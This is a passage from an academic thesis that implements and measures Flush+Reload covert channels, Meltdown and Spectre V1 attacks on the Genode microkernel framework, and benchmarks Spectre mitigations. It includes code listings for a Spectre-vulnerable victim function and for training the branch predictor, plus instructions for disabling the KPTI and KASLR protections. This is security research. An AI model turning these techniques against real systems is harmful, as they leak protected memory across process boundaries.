Implementation of Flush+Reload required some adaptations depending on the intendedtarget. One adaptation which had to be made is that the rdtsc instruction was used insteadof rdtscp as the instruction resulted in a crash on Nova. Thus, the alternative recommended

24


timer suggested by Paoloni [34] was used for Linux and Okl4, see Listing 2.2. The alternativetimer suggested by Paoloni was used for Nova, see Listing 2.3.

3.2.4 Measuring Throughput of the Covert Channel

The throughput for the covert Flush+Reload channel was measured for use between twoprocesses, see Figure 3.7, and for use inside a single process. The throughput was measuredas described in Section 3.1.6.

: Receiver : Transmitter

RPC_shared_memory()

Shared_memory_cap

Lock

Cache current data

Unlock

Flush all 256 values

Tell caching process to start

Wait for unlock

Measure fetch time for index 0..255

Log index corresponding to first LLC hit

Loop

Figure 3.7: A sequence diagram of Flush+Reload communication between two processes.

The throughput for communicating internally with Flush+Reload was measured by using aprocess which first cleared the leak array from the cache, then cached the current value andused lfence to wait for transmitted byte to be cached. The process then continued iteratingover all values in the leak array to check for an L1 cache hit. The throughput could after thatbe measured by using the method described in Section 3.1.6.

3.2.5 Reducing Noise

To obtain a reliable Flush+Reload channel it may be necessary to make multiplemeasurements, as done by others [31, 25]. R measurements, mij, were taken for a value iwith the purpose of increasing the accuracy. A cache hit detection function fc was used witha threshold of tc to build a histogram H of recorded cache hits where each entry hi is the countof detected cache hits for value i. The estimation v of the transmitted value v was calculatedas:

v = maxiPt0..255u

hi

where,

hi =R

j=0

fc(mij)

and,

fc(x) =

#1 if x tc

0 otherwise

In addition, synchronizing was needed to increase the probability of a successfultransmission. Locking was used in order to synchronize the transmitter with the receiver.

25

3.3. Implementing Meltdown

3.3 Implementing Meltdown

The methodology for Meltdown was based on the POC by Lipp et al. [31]. Specifically,Meltdown required methodologies for recovering from a segmentation fault, identifying atarget address, obtaining an observable result via a Flush+Reload channel and synchronizingthe transmitter with the receiver. Additionally, on the Linux kernel, there was a need todisable KPTI for the attack to work.

3.3.1 Recovering from Segmentation Fault

Since Genode does not provide support for segmentation fault handlers [7], another methodwas needed. One possible method is to start a new child process for each read which leadsto a segmentation fault [31]. This method allows for transmitting a single byte with eachstarted child. Another method is to use Intel TSX to suppress the fault [31]. Both methodswere evaluated, Intel TSX was chosen due to a more straightforward attack design and fewerresource requirements.

: Server

Use TSX tocache current dataMeasure fetch time forfor index 0..255Log index correspondingto first LLC hit

Loop

Figure 3.8: A sequence diagram of Meltdown using Intel TSX and Flush+Reload.

If Intel TSX is used, no inter-process synchronization is needed. A process will continue itsexecution even if non-accessible memory was accessed during a transaction. The attacker cantherefore run Flush+Reload directly after the Meltdown attack, see Figure 3.8.

3.3.2 Disabling Mitigations

Because of the significant impact on performance by KPTI, some kernels enable opting outof these security patches6. The KPTI mitigation can be disabled in Ubuntu+Linux by addingthe flag pti=off as a boot parameter for the kernel in the file </etc/default/grub>. Tosimplify the Meltdown attack on Linux, KASLR can be disabled with nokaslr. This preventsrandom placement of kernel space at boot.

3.3.3 Choosing a Target Address

Two target addresses were used, the Linux version banner and a victim process. Previouswork has had success with these variants 7 8. Furthermore, they were chosen due to the easeof confirming success using an existing working attack.

6Ubuntu. MitigationControls - Ubuntu Wiki. 2018. URL: https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SpectreAndMeltdown/MitigationControls (visited on 2019-02-05).

7https://github.com/paboldin/meltdown-exploit8https://github.com/IAIK/meltdown

26

https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SpectreAndMeltdown/MitigationControls

https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SpectreAndMeltdown/MitigationControls

https://github.com/paboldin/meltdown-exploit

https://github.com/IAIK/meltdown

3.4. Implementing Spectre

In the first alternative, the attacker targets a location for a version string defined in theLinux kernel. Confirmation of correct data was done by reading a file using root privileges.

For the second alternative, a victim process was set up to allocate a secret array of 2048bytes. Calculating its physical address was done using tools published by Lipp et al. 8. Thearray was cached cached by the victim. Thereby, the address and value of the target addressesare known, and the addresses along with its values are cached. Measuring the throughput ofthe attack could, thereafter, use the same method as described in Section 3.1.6.

3.4 Implementing Spectre

The design of the Spectre V1 attack consisted of an overall design based on previous work 9

10, see Figure 3.9. Specifically methodologies for ensuring speculative execution, training thebranch predictor and increasing accuracy by tuning parameters was used.

: Server : Attacker

RPC_shared_memory()

Shared_memory_cap

Flush all 256 valuesvictim_function(x)

arr[x]

victim_function(malicious)Measure fetch timefor index 0..255Log index correspondingto first LLC hit

Train

Figure 3.9: A sequence diagram of Spectre using Flush+Reload.

The attack setup consisted of a victim process and an attacker which shared a common outputbuffer. The victim was a vulnerable RPC which accessed an array based on an input indexand a bounds check, see Listing 3.7. The attacker exploits this by issuing Ta � 1 trainingrequests to a victim_function. After Ta�1 requests the attacker issues a malicious requestmalicious = target_address with an index targeting an address beyond the bounds ofthe array. For the attack to work, the vulnerable RPC needs to be speculatively executed andthe branch predictor needs to be trained.

Listing 3.7: Victim Function which is Vulnerable to Spectre V1

1 void victim(size_t idx) {2 if(idx < array_size) {3 int foo = array[idx]; // May speculatively execute4 do_something(foo); // array_size is not in cache5 }6 }

9https://gist.github.com/anonymous/99a72c9c1003f8ae0707b4927ec1bd8a10https://github.com/crozone/SpectrePoC

27

https://gist.github.com/anonymous/99a72c9c1003f8ae0707b4927ec1bd8a

https://github.com/crozone/SpectrePoC


3.4.1 Ensuring Speculative Execution

Speculative execution, according to Intel, is highly dependant on microarchitecturalimplementation and may vary across different processor families [19]. Kocher et al. [24] statethat one trigger for speculative execution is a cache-miss prior to or during branch conditionevaluation. Therefore, the boundary check values needs to be removed from the cache.

A heuristic flush of the cache was done by performing many memory accesses,see Listing 3.8. CACHE_LINE_SIZE was chosen according to the targetedhardwares cache line size of 64 bytes. This size was retrieved using the commandgetconf LEVEL1_DCACHE_LINESIZE on Xubuntu 18.04 LTS.

Listing 3.8: Heuristic Flush of Non-Shared Condition Variable

1 void heuristic_flush() {2 for(size_t i = 0; i < Hs; i += CACHE_LINE_SIZE)3 large_array[i];4 }5 void speculative_execution() {6 heuristic_flush(); // Fill cache with garbage7 _mm_lfence(); // Ensure flush executes before victim8 victim(); // Condition variable9 } // is hopefully evicted

3.4.2 Configure Variables for Spectre

Some parameters needed to be chosen before evaluating the attack throughput. First, twovalues for training the branch prediction were needed, and secondly a parameter for flushingthe cache.

Training branch prediction meant polluting the BTB, which is a type of cache [19]. Thiswas done in a similar manner to polluting the LLC; by repetitively committing values to thecache, i.e., branching to the desired location, see Listing 3.9. As described in Section 2.5.1,the value with which the condition is checked needs to be flushed from the cache to triggerspeculative execution of the incorrect branch. At this point the condition value was part ofthe shared memory so that it could be flushed by the attacker.

Three parameters were needed to execute the Spectre attack: number of attacks permeasurement Na, the attack period Ta and the number of memory accesses used to flush thecache Hs. Attacks per measurement Na and Ta were chosen by testing all integers Na P [1, 10]and Ta P [2, 10] to find which combination gave the highest throughput in reading 2048 bytesfrom the vulnerable process. To determine values for Na and Ta, Hs was initially chosen to4096 � 32, it was then tested using an exponential sample between 64 and the size of the CPU’scache to find a local optimum. It should be noted that the purpose of these local optimizationsis not to achieve an optimum, but rather to gauge the possible throughput of this attack.

Na � Number of attacks per measurement

Ta � Attack period

Hs � Number of accesses in the heuristic flush

(3.4)

To modify the contents of the BTB during training, some non-branching bit operationswere used in place of an explicit branch, see Listing 3.10. Lines 4 and 5 yieldx = 0xFFFFFFFF if (i % 6 == 0) else = 0x00000000. Line 6 then evaluates asx = malicious if (x % 6 == 0) else train.

28


Listing 3.9: Training the Branch Bredictor

1 void spectre() {2 heuristic_flush();3 for(int i = Ta - 1; i >= 0; --i) {4 if(i % Ta)5 victim_function(malicious_x); // Ta:th iteration6 else7 victim_function(x);8 }9 }

Listing 3.10: Training the Branch Predictor Without Explicit Branch

1 void spectre() {2 heuristic_flush();3 for(int i = Ta - 1; i >= 0; --i) {4 x = ((i % Ta) - 1) & ~0xffff; // Prevent jumps5 x = (x | (x >> (sizeof(int) * 4))); // and use6 x = train ^ (x & (malicious ^ train)); // malicious x every7 victim_function(x); // Ta:th iteration8 }9 }


The vulnerable process contained an array of size 16+2048 bytes. The first 16 bytes wereaccessible via RPC and was used for training. The attacker then used Spectre V1 withFlush+Reload to get the last 2048 bytes from the array, and then forwarded the values tothe measuring system. From here the method described in Section 3.1.6 was used to measurethe throughput.

3.4.4 Measuring Impact of Mitigations

Two methods of mitigation were applied to Spectre V1. The first: preventing speculativeexecution using lfence, see Listing 2.6. The second: Index masking as used in Linux,see Listing 2.8. The impact on performance for the two different mitigations was testedby measuring the execution time for RPC, before and after applied each mitigation. Theexecution time was measured using the method described in Section 2.2.2.

29

4 Results

The results from the covert Flush+Reload channel, along with its design parameters, ispresented in Section 4.1 and is intended to answer Research Question 1. The throughputof the Meltdown attack on Genode+Linux, intended to answer Research Question 3, ispresented in Section 4.2 for two different victims. The results for the throughput of the SpectreV1 attack is presented together with RPC benchmarks for its mitigations in Section 4.3. Theseresults are intended to answer Research Questions 2 and 4 respectively.

4.1 Flush+Reload

Results of choosing which thresholds to use for the different kernels and attacks is shown inSection 4.1.1. The results related to preventing prefetching is shown in 4.1.2. Section 4.1.3shows the throughput of the covert channel and answers Research Question 1. Section 4.1shows the result from reducing noise.

4.1.1 Choosing Cache-Hit Thresholds

Figures 4.1 to 4.3 show the times taken to access values which have been stored in LLC,those stored in L1 cache as well as values which were not cached. These access times weremeasured using the timing function described in Listing 2.2. It can be seen that there are threedistinct levels of memory access times. Levels which can distinguished from each other viathe use of a high resolution timer. A memory access can thus be determined to be from theL1 cache, the LLC or DRAM.Table 4.1 shows the choices of tLLC and tL1 for each kernel along with a valid interval for thechoices. The valid interval describes the interval in which there are no measurements fromthe cache level above and all from the desired one. For example, there are no measurementsfrom LLC below 73 cycles on Okl4. Thus, the valid interval for tL1 on Okl4 is [56, 72]. Thechoice of tLLC and tL1 was chosen as the upper bound of the measurements for the LLC andL1 cache respectively.

30

4.1. Flush+Reload

0 20 40 60 80 100 120 140 160 180 200 220 2400

tL1 = 51tLLC = 81

300

Value

Acc

ess

Tim

e(C

ycle

s)Uncached

LLC CachedL1 Cached

Figure 4.1: Time measurements for accessing L1 cached, LLC cached and uncached values onGenode+Okl4.

0 20 40 60 80 100 120 140 160 180 200 220 2400

tL1 = 42tLLC = 80

300

Value

Acc

ess

Tim

e(C

ycle

s)

UncachedLLC CachedL1 Cached

Figure 4.2: Time measurements for accessing L1 cached, LLC cached and uncached values onGenode+Nova.

Kernel tLLC tLLC P tL1 tL1 P

Okl4 81 [81, 239] 56 [56, 72]Nova 80 [80, 219] 42 [42, 64]Linux 139 [139, 239] 54 [54, 78]

Table 4.1: The Cache-hit thresholds in CPU cycles for each kernel.


Tables 4.2 to 4.4 shows the number of detected cache hits from the array reads using theSRGs from Equations (3.2) and (3.3) and different sizes of the internal padding. The SRG 49imod 256 is the preventing prefetching at the smallest internal padding and thus results in thesmallest memory footprint of the Flush+Reload channel. Therefore, the SRG in Equation (3.2)and the internal padding of length 256 was used to obtain further results.

4096 2048 1024 512 256 12849i mod 256 0 0 0 0 2 817333i mod 256 0 0 2299 1 400 5916

i 0 0 28777 31427 31974 61137

Table 4.2: Number of cache hits from iteration over uncached array using an SRG 256 timeson Genode+Okl4 for different internal padding sizes.

31

4.1. Flush+Reload

0 20 40 60 80 100 120 140 160 180 200 220 2400

tL1 = 54

tLLC = 139

300

Value

Acc

ess

Tim

e(C

ycle

s) UncachedLLC CachedL1 Cached

Figure 4.3: Time measurements for accessing L1 cached, LLC cached and uncached values onGenode+Linux.

4096 2048 1024 512 256 12849i mod 256 0 0 0 1 1 893633i mod 256 0 0 1900 1 401 7283

i 0 0 27357 31666 32242 61541

Table 4.3: Number of cache hits from iteration over uncached array using an SRG 256 timeson Genode+Nova for different internal padding sizes.

4096 2048 1024 512 256 12849i mod 256 1 0 0 0 1 756933i mod 256 0 1 1787 0 400 5798

i 0 0 14691 29007 33259 62166

Table 4.4: Number of cache hits from iteration over uncached array using an SRG 256 timeson Genode+Linux for different internal padding sizes.

16 32 48 64 80 96 112 128 144 160 176 192 208 224 2400

100

200

300

Iteration

Num

ber

ofcy

cles

idx = 49i mod 256idx = 33i mod 256sequential access

Figure 4.4: Time to access values in a pseudo-randomized or sequential pattern using 256bytes as internal padding on OKl4.

32

4.1. Flush+Reload

16 32 48 64 80 96 112 128 144 160 176 192 208 224 2400

100

200

300

Iteration

Num

ber

ofcy

cles

idx = 49i mod 256idx = 33i mod 256sequential access

Figure 4.5: Time to access values in a pseudo-randomized or sequential pattern using 4096bytes as internal padding on Okl4.

Figures 4.4 and 4.5 shows the time it takes to fetch each value in an uncached array using aninternal padding 256 and 4096 bytes respectively. The plots were created by iterating overthe array in some order and measuring the time for each array access. Measurements using asequential access pattern is presented for completeness. In Figure 4.5, it can be seen that thereis no prefetching when an internal padding of 4096 is used. In Figure 4.4, it can be seen thatthe SRG idx = 49i mod 256 results in memory access times comparable to DRAM accesses.Thus, it is successfully preventing prefetching and the internal padding can be reduced to256 without performance degredation.


Our results in Tables 4.5 and 4.6 shows how Flush+Reload can be used as a side or covertchannel both between and within processes; Linux had the highest throughput in both cases.Linux had a similar or lower number of correct bytes but did still have a greater throughputcompared two the microkernels, this shows that Linux had a lower execution time than Okl4and Nova.

Flush+Reload was able to transmit a maximum of 26383 Bps when reading and writingin the same process using one attempt. The data for each kernel is presented in Table 4.5.Flush+Reload, when used as a covert channel, was able to transmit a maximum of 13436 Bps

Kernel Correct Incorrect Missing Throughput (Bps)Okl4 1858 190 0 1651Nova 1711 331 6 29500Linux 1926 122 0 26383

Table 4.5: Reading 2048 bytes with Flush+Reload within one process.

between two processes using one attempt. The data for each kernel is presented in Table 4.6.Okl4 and Nova’s low throughput may be a consequence of the locking mechanism used, forfurther discussion see 5.1.4.


Results from using the method to reduce noise described in Section 3.2.5 is presented inthis section. Tables 4.7 to 4.9 contains the result from noise reduction when Flush+Reloadwas used within a process. Tables 4.10 to 4.12 show the result of noise reduction when

33

4.1. Flush+Reload

Kernel Correct Incorrect Missing Throughput (Bps)Okl4 1777 255 0 36Nova 1803 245 0 44Linux 1247 281 520 13409

Table 4.6: Reading 2048 bytes with Flush+Reload between two processes.

Flush+Reload was used to communicate between processes. As can be seen in Table 4.7 therewas a slight increase in throughput for two attempts on Genode+Okl4. On Genode+Linuxthe increase was more substantial, see Table 4.12. Consequently, two attempts will be usedfor further results on Genode+Linux for communication between two processes.

Number of Attempts Correct Incorrect Missing Throughput (Bps)1 1858 190 0 16512 1879 169 0 16553 1885 163 0 15784 1884 164 0 14815 1890 158 0 14286 1886 162 0 13727 1887 161 0 13018 1888 160 0 12509 1889 159 0 1202

10 1889 159 0 1160

Table 4.7: Reading 2048 bytes using Flush+Reload within a process on Genode+Okl4 withdifferent number of attempts.


10 1737 304 7 3080

Table 4.8: Reading 2048 bytes using Flush+Reload within a process on Genode+Nova withdifferent number of attempts.

34

4.1. Flush+Reload


10 1857 191 0 3085

Table 4.9: Reading 2048 bytes using Flush+Reload within a process on Genode+Linux withdifferent number of attempts.


10 1931 133 0 4

Table 4.10: Reading 2048 bytes between two processes, using Flush+Reload on Genode+Okl4with different number of attempts.


10 1791 257 0 4

Table 4.11: Reading 2048 bytes between two processes, using Flush+Reload on Genode+Novawith different number of attempts.

35

4.1. Flush+Reload


10 2048 0 0 2296

Table 4.12: Reading 2048 bytes between two processes, using Flush+Reload onGenode+Linux with different number of attempts.

36

4.2. Meltdown

4.2 Meltdown

The throughput of the Meltdown attack targeting a victim, as described in Section 3.3, ispresented in Section 4.2.1. The negative result targeting the Linux banner is presented inSection 4.2.2.

4.2.1 Reading a Victim’s Secret

The resulting throughput using our Meltdown attack to read 2048 bytes from another processis shown in Figure 4.6. The result shows a fluctuating throughput, ranging from 63 to 11070Bps.

32 64 96 128 160 192 2240

0.5

1

�104

Test number

Thro

ughp

ut(B

ps)

Figure 4.6: Throughput from reading 2048 bytes from another process in Genode usingMeltdown on Genode+Linux.

4.2.2 Reading the Linux Version Banner

The reading of the Linux banner with the Meltdown attack was unsuccessful; no bytes weretransmitted. Hence, the attack had a throughput of 0 Bps.

4.3 Spectre

The results for the choice of Hs to ensure speculative execution is presented in Section 4.3.2.The choice for Na and Ta are presented in Section 4.3.1. The throughput of the Spectre V1attack using these parameter choices are presented for all kernels in Section 4.3.3. Benchmarksfor RPCs are presented in Section 4.3.4.

4.3.1 Training the Branch Predictor

Attack period, Ta, and number of attacks per measurement, Na, were tested for 2 ¤ Ta ¤ 10and 1 ¤ Na ¤ 10 on Okl4, Nova and Linux. The result from the tests are shown in Figures 4.7to 4.9. The results shows that all the kernels have the highest throughput at Na = 1 andTa = 3. Furthermore, the throughput tends to be lower when Na or Ta approaches highervalues.

37

4.3. Spectre

1 2 3 4 5 6 7 8 9 10

23456789

10

Na

T a

0

200

400

600

800

Thro

ughp

ut(B

ps)

Figure 4.7: Throughput out of for different choices of Ta and Na when reading a total of 2048bytes on Genode+Okl4.

1 2 3 4 5 6 7 8 9 10

23456789

10

Na

T a

0

500

1,000

1,500

Thro

ughp

ut(B

ps)

Figure 4.8: Throughput of the Spectre attack for different choices of Ta and Na when readinga total of 2048 bytes on Genode+Nova.

1 2 3 4 5 6 7 8 9 10

23456789

10

Na

T a

0

1,000

2,000

3,000

Thr

ough

put(

Bps)

Figure 4.9: Throughput of the Spectre attack for different choices of Ta and Na when readinga total of 2048 bytes on Genode+Linux.

38

4.3. Spectre

4.3.2 Ensuring Speculative Execution

The Spectre V1 attack on Okl4, Nova and Linux had its highest throughputs at Hs = 215, 217

and 220 respectively. Note that the difference in Hs varies a factor of 25 between kernels, thus,choosing a single value for all kernels is likely not suitable.

26 29 212 215 218 221 2240

500

1,000

1,500

2,000

Hs

Thro

ughp

ut(B

ps)

Okl4NovaLinux

Figure 4.10: Throughput for Spectre V1 using different choices of Hs for heuristically flushingthe cache.

4.3.3 Attack Throughput

The result from trying to read 2048 bytes from an array containing random values withour Spectre V1 implementation is presented in Table 4.13. The results shows the highestthroughput for Nova at 1760 Bps.

Kernel Retries Na Ta Hs Throughput (Bps)Okl4 1 1 3 215 1029Nova 1 1 3 217 1760Linux 2 1 3 220 525

Table 4.13: Result of reading 2048 bytes with Spectre V1 with chosen parameters.

4.3.4 Mitigations

The RPC benchmarks on Okl4, Nova and Linux before and after applied Spectre V1mitigations are presented in Figures 4.11 to 4.13. The relative slowdown of these mitigationsare presented in Tables 4.14 and 4.15

39

4.3. Spectre

1 128 254 382 5121.95

2

2.05

2.1

2.15

2.2�104

Test number

CPU

cycl

esNo mitigation

lfence

1 128 254 382 512Test number

No mitigationarray_index_mask_nospec

Figure 4.11: Measurements of execution time of RPC on Genode+Okl4 using Spectre V1mitigations.

1 128 254 382 512

3.3

3.4

3.5

3.6

3.7

�104

Test number

CPU

cycl

es

No mitigationlfence

1 128 254 382 512Test number


Figure 4.12: Measurements of execution time of RPC on Genode+Nova using Spectre V1mitigations.

40

4.3. Spectre

1 128 254 382 5124

5

6

7

�104

Test number

CPU

cycl

es

No mitigationlfence

1 128 254 382 512Test number


Figure 4.13: Measurements of execution time of RPC on Genode+Linux using Spectre V1mitigations.

Kernel Mean Standard deviationOkl4 0.9875 0.2305Nova 0.9992 0.0090Linux 1.0077 0.3430

Table 4.14: Mean relative slowdown and standard deviation after applied lfencemitigation.

Kernel Mean Standard deviationOkl4 0.9908 0.3242Nova 1.0028 0.0107Linux 1.0310 0.3365

Table 4.15: Mean relative slowdown and standard deviation after applied bitmaskmitigation.

4.3.5 Error Sources

During measurements, some anomalies were identified, one being unstable performance onthe Linux kernel. Figure 4.14 show how the result for the different kernels change betweencompilations of the same source code. Furthermore, Figure 4.15 shows the result betweenruns with the same binaries.

41

4.3. Spectre

1 3 5 7 9

20%

40%

60%

80%

100%

Test number

Acc

urac

y

Okl4NovaLinux

Figure 4.14: Percentage of correctly read bytes from reading 2048 bytes and compiling theapplication between each test.

1 4 7 10 13

0%

20%

40%

60%

80%

100%

Test number

Acc

urac

y

Okl4NovaLinux

Figure 4.15: Percentage of correctly read bytes from reading 2048 bytes from running thesame binary multiple times on Linux.

42

5 Discussion

The method is discussed in terms of its reliability, validity and replicability in conjunctionwith each attack. In addition, anomalies in the results are also discussed. The impact of thiswork, Microarchitectural attacks and SCAs are discussed in a wider context in Section 5.5.

The result of the produced covert channel and Spectre attack are considered successful,whereas further work is needed to evaluate if microkernels are vulnerable to Meltdown.

We have shown that it is possible to use a Flush+Reload channel to communicate bothwithin and between processes, consequently breaking Genode’s strict IPC policies. We havedemonstrated that it is possible to construct a Meltdown attack targeting Genode and that thisattack is successful on Genode+Linux. Furthermore, an Spectre V1 attack has been performedsuccessfully on all the tested microkernels.

Microarchitectural attacks are highly reliant on hardware and despite our best efforts wehave not found closely detailed ways to configure these attacks; this is likely in part due tothe proprietary nature of the hardware. Consequently, there may be difficulties obtaining thesame results on other hardware. However, the methodology should be reproducible on otherhardware supporting the same instruction sets. Factors not detailed about the tested systemmay affect results, such as other processes running concurrently on the system or how theprocesses are scheduled on the CPU cores.

5.1 Flush+Reload

Although Flush+Reload is conceptually well defined, its realization may vary with availabletimers. Moreover, there are implementation-specific techniques which have been used, theseneed evaluation and may require some discussion of their validity.

5.1.1 Cache-Hit Measurements

One validity issue with our method of measuring cache hits is that there is no guarantee thatthe LLC threshold is truly a threshold below which everything is accesses to LLC. It is entirelypossible for the kernel to schedule the measuring process and the measured process on thesame core, thereby allowing values to be accessed from caches below LLC. Consequently, allthese measurements may be from lower-level caches. However, it is highly likely that the

43

5.1. Flush+Reload

measurements were from the LLC or the L2 cache since the result of measuring the LLC gaveanother result than the measurements from L1 cache.

Issues with the L1 cache threshold we deem less likely. It is possible that all accesses to theL1 cache are in fact to higher level caches but, given the less complex method of measuring,at least some measurements should be of the L1 cache.

5.1.2 Choosing Cache-Hit Thresholds

As we can see in Figures 4.2 and 4.3 there are significant spikes for some uncached values.These spikes are unlikely regular DRAM accesses as they are significantly slower than theexpected� 250 cycles. These values are in the [1000, 2500] range and are more likely the resultof context switching between the start and end of the timer. This is less likely to happen inthe LLC and L1 cache tests as the fetch time for these values are lower and, therefore, givesthe kernel less time to context switch.

The exploits Spectre and Meltdown are highly dependant on hardware, thus efforts toreplicate exploits on other CPUs may vary. The choice of cache-hit thresholds tL1 and tLLCas shown in Figures 4.1 to 4.3 may have to be chosen differently depending on cache andmemory speeds. Zhou et al. [50] suggests that thresholds should be chosen to be just belowthe lower bound of the closest higher memory level. However, we found that using thisrecommendation resulted in a noisy channel which resulted in a lower throughput on thetested machine.


With the object of preventing data prefetching we can see in Figure 4.5 that using an offsetof 4kB successfully removes false cache hits. Furthermore, in Tables 4.2 to 4.4 we see thatusing an SRG can significantly reduce memory requirements. However, we can see that oneSRG does not get progressively worse for smaller padding sizes, which is surprising, as theexpected behavior is that the CPU more easily detect semi-sequential patterns for smallerpaddings. In addition, the SRG may need to be evaluated on each CPU. It is likely thatsome SRGs may perform better than others in general, as the main parameter determiningprefetching is subsequent sequential accesses. Thus, the performance is depends on whetherthe sequence generated by the SRG has such a pattern. It may also be possible to excludeSRGs and instead craft a non-sequential pattern which yields good results.

5.1.4 Inaccuracies in Throughput Measurements

Two different methods were used to measure the execution time. For Okl4, the executiontime was measured on the measuring system. This method is less accurate as the delay ofdelivering data via serial communication affects the measurements. Hence, the executiontime will be dominated by the measurement overhead for low attempt counts. A greaterexecution time will lower the impact of the delay. This may be the reason why Okl4 is theonly kernel with a greater throughput at two attempts when using Flush+Reload as a channelwithin a process, see Table 4.7. It is expected that doubling the number of attempts shouldresult in twice the execution time. It is unexpected that the throughput of Flush+Reloadwithin a process performs equally well for one and two attempts, with only a small changein number of correct bytes, as is observed on Okl4.

Genode+Linux had a significantly higher throughput opposed to Genode on themicrokernels. We believe that, when Flush+reload is used to communicate betweenprocesses, the significant difference in throughput is largely due to processes being scheduleon the same core on Genode+Nova/Okl4. This is based on a much slower execution timewhen synchronization was applied, indicating that a majority of the execution time in Nova

44

5.2. Meltdown

and Okl4 is due to locking. The throughput of Flush+Reload with a different synchronizationstrategy may be significantly higher than the current implementation.


We can see in Tables 4.8 to 4.11 that there is no substantial improvement for the covertchannel with respect to number of attempts. The concept may be more successful incases where synchronization is not performed or where synchronization measures are notavailable. The only test giving a higher number of correct bytes was with Genode+Linuxusing Flush+Reload between two processes, see Table 4.12.

5.2 Meltdown

Our Meltdown attack gave a fluctuating throughput, running the attack gave everythingfrom a throughput of 63 to 11070 Bps. An implementation returning only 0xFF wouldtransmit a byte observed as correct every 256th transmission or 8 times out of 2048, assumingequally distributed input. Furthermore, execution time for the attack was similar to 0.1 s.Therefore, an attack returning only noise would have a throughput of 8 Bytes

0.1 s = 80 Bps. Thus,the results having a throughput of around 80 Bps is regarded as noise.

5.2.1 Alternative Segmentation Fault Recovery

Two methods were evaluated for recovering from the segmentation fault which was triggeredby the illegal read: child process spawning and Intel TSX. Although the second approachrequires certain hardware, the first poses several problems. Firstly the allocation of asecond process and with this, the time it takes to allocate and start this process. Secondly,synchronization between sender and receiver as there is now potentially two concurrentlyrunning processes. Thirdly, it raises a segmentation fault to the kernel resulting in the sendercrashing. Using Intel TSX does result in a faulty access, but the TSX mechanism protects theprocess from the kernel interfering, as the code which raised it is not conceptually executed.

We were unsuccessful with the child spawning design as it was significantly slower, theoverhead of starting processes became a bottleneck, and it eventually caused a segmentationfault in the receiver. This design may still be successful, thus removing the need for IntelTSX. However, such a design will still suffer from significantly slower execution due to theoverhead of spawning processes.

5.2.2 Turning off Mitigations

It may be considered unreasonable to turn off mitigations for Meltdown in order to allowthe attack to work. However, as performance impact can be significant for some applicationswhich are heavy on system calls. We think that there is still interest in this case. Furthermore,turning off mitigations has allowed us to establish that Genode is vulnerable to the Meltdownattack and that it does nothing which prevents the Meltdown attack on its own.

5.2.3 The Difficulties of Reading Secrets

The Meltdown attack presented some difficulties in the context of Genode. Genode didnot support control over which core a process should execute on, nor was there access toa shed_yield operation. These tools greatly improve success of the published MeltdownPOC [31].

45

5.3. Spectre

5.2.4 Reliability Issues with Meltdown

We were able to read with a throughput of approximately 11000 Bps in some tests, however,we were only able to reproduce this a handful of times. We suspect that reliability issuesare due to scheduling-race conditions and uncached data, we base this on the fact that theMeltdown attack is very successful at reading its own process memory.

We were not able to read the Linux banner, if that is pure coincidence or due to othercircumstances we have not been able to determine. One aspect that made it more difficult toread the Linux banner was the lack of cached data. In our experiment, the banner was notcached prior to the attack, which may result in a lower chance of success.

5.3 Spectre

Some of the methodologies to implement Spectre may prove to be suboptimal or ineffectiveon different systems. As these attacks are highly reliant on hardware, it may be the case thatthe methologies for configuring the attack may not generalize well to other hardware. Usingretries as a method of improving successful transmission has been tried by others [24] buthas not significantly improved the results in the experiments we conducted. Furthermore,the use of an SRG was demonstrated to significantly vary in performance, depending ondistance between accessed values and which SRG is used.

The Spectre V1 attack abuses a very specific type of RPC. The result shows that neitherGenode nor the microkernels Nova and Okl4 are invulnerable to the Spectre V1 attack.Therefore, there is a need to apply mitigations in order to be protected against Spectre.

5.3.1 Training the Branch Predictor

First of all, it should be noted the method for choosing Na and Ta is unlikely to be optimal.To the best of our knowledge, there has been no work demonstrating optimizations of thesevalues. Thus, the purpose of the effort to choose Na and Ta well with respect to throughputis merely to find working values and to gauge the magnitude of the possible throughput.

The result of trying different number of attacks per measurement Na and attack periodTa can be seen in Figures 4.7 to 4.9. All three result has there greatest peaks at Na = 1 andTa = 3 as well as tending to lower throughput for larger values of Na and Ta. Linux seemsto show a somewhat randomized pattern; the variations may be due to the instability of theimplementation on Genode+Linux, see Figures 4.14 and 4.15.

The computer was not reset between the tests for choosing Na and Ta. This was done toreduce execution time for the tests. This may have lead to some noise when reading the firstbytes since the BTB had not been flushed. However, the significant amount of bytes read bythe attack should have reduce the noise’s impact on the result.

5.3.2 Criticism of Heuristic Cache Flush

The heuristic cache flush technique described in Section 3.4.1 has not been verified, it wasused as no other method of flushing the cache without a reference address was found. Theresult in Section 4.3.2 were obtained as a step to verify the methodology. It is noteworthy thatthe throughput declines with increasing sizes. We deem this phenomenon likely to be due toincreased execution time, as one would expect a linear decline when increasing the size giventhat the cache flush is successful above some size.

5.3.3 Throughput Anomalies

Table 4.13 shows the throughput of our Spectre V1 attack, where the throughput for bothOkl4 and Nova was higher than the throughput of the Flush+Reload channel used. This mayseem strange, but is probably an effect of our locking method described in Section 3.2.4. Our

46

5.4. Source criticism

Spectre attack dose not uses the same locking and dose instead use the RPC call as a lock,which seems to be more efficient. The current implementation of Flush+Reload uses busywaiting, a better solution would probably be to yield during the wait; increasing the chanceof the other process getting scheduled and lowering the execution time. However, we couldnot find an easy and working method of yielding in Genode.

It can be observed in Figures 4.14 and 4.15 that the accuracy aLinux varies substantiallybetween compilations and execution, 12% a 99% between compilations and 12.4%

a 99.1% between runs. Due to the hardware dependant nature of the problem, smalldifferences in realized assembler may result in different results. Hence, efforts to reproduceresults for Linux may vary. For Okl4 and Nova the variations were substantially smaller,39.1% aOkl4 54.9% and 78.3% aNova 97.3% between compilations and 52.3%

aOkl4 54.9% and 84.4% aNova 97.5% between runs respectively.

5.3.4 Small Impact on Performance

Figures 4.11 to 4.13 shows the number of CPU cycles needed to use our RPC both with andwithout Spectre V1 mitigation. From Figures 4.11 to 4.13 and tables 4.14 and 4.15 we cansee that the mitigation had no real impact on performance, in some cases the RPC withmitigations was faster than using the RPC without mitigations. Both the lfence and thebitmask mitigation should only needs a small number of CPU cycles to execute comparedto the � 2000 cycles needed to run the RPC.

5.4 Source criticism

